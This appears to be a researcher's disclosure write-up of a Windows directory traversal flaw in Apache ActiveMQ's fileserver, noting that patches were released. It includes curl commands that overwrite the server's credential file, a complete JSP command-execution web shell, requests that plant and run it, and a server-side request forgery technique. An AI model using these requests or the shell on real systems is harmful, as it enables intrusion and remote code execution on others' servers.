I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution. Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes: Effectively blocking the upload of JSP files into contexts that will allow them to execute. I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials: $ cat jetty-realm.properties hacker: hacker, admin $ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties This seems to have the disadvantage of requiring a reboot of the server to take effect. I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. The attacker can then take a standard JSP shell: $ cat cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> Commands with JSP
  
 <%  
 if (request.getParameter("cmd") != null) {  
 out.println("Command: " + request.getParameter("cmd") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context: $ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp And pop a calc on the server: $ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe Exploiting non-Windows servers All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. That said, clients can specify the uploadUrl for a blob transfer, e.g.: tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers. Resolution The ActiveMQ project has released an advisory and patches. This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.